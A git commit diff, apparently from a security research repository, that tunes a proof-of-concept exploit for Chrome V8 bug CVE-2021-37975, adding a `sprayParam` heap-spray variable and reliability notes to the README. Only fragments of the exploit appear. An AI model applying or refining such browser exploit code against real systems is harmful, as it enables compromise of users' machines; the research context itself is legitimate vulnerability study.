Improve parameter

m-y-mo · m-y-mo · commit 54ec638ebb17 · 2021-10-08T11:15:50.000+01:00
diff --git a/SecurityExploits/Chrome/v8/CVE-2021-37975/README.md b/SecurityExploits/Chrome/v8/CVE-2021-37975/README.md
@@ -2,7 +2,7 @@
 
 The analysis of this bug can be found [here](https://securitylab.github.com/research/in_the_wild_chrome_cve_2021_37975). This is a Chrome bug that is reported by an anonymous researcher and was believed to be exploited in the wild.
 
-The exploit here is tested on `v8` version 9.4.146.16 (commit `452f57b`), which is the version shipped with Chrome 94.0.4606.71, the one before the bug is fixed, on Ubuntu 20.04. Tested on two different devices with different specs.
+The exploit here is tested on `v8` version 9.4.146.16 (commit `452f57b`), which is the version shipped with Chrome 94.0.4606.71, the one before the bug is fixed, on Ubuntu 20.04. Tested on two different desktop devices with different specs.
 
 To test, check out `v8` at commit `452f57b` and compile with the default settings using `tools/dev/gm.py x64.release`. Then open the file `poc.js` with `d8`:
 
@@ -44,4 +44,4 @@ $
 
 Shell code may need changing on other platforms.
 
-The exploit is not reliable, (probably about 50 percent success rate). The variable `gcSize` may need changing depending on the device, and the variable `mapAddr` also depends on the version of v8 (it is an offset).
+The exploit is not reliable, (probably about 50 percent success rate). The variable `gcSize` may need changing depending on the device, and the variable `mapAddr` also depends on the version of v8 (it is an offset). Changing the variable `sprayParam` may also improve the reliability. The current parameter seems to give reasonable reliability across the two devices tested.
diff --git a/SecurityExploits/Chrome/v8/CVE-2021-37975/poc.js b/SecurityExploits/Chrome/v8/CVE-2021-37975/poc.js
@@ -8,6 +8,7 @@ var initKey = {init : 1};
 var level = 4;
 var map1 = new WeakMap();
 var gcSize = 0x4fe00000;
+var sprayParam = 100;
 
 //Get mapAddr using DebugPrint for double array (the compressed address of the map)
 var mapAddr = 0x8203ae1;
@@ -141,7 +142,7 @@ function main() {
 
 	let objArr = [];
 
-	for (let i = 0; i < 200; i++) {
+	for (let i = 0; i < sprayParam; i++) {
 	  let thisArr = new Array(1 << 15);
 	  objArr.push(thisArr);
 	}
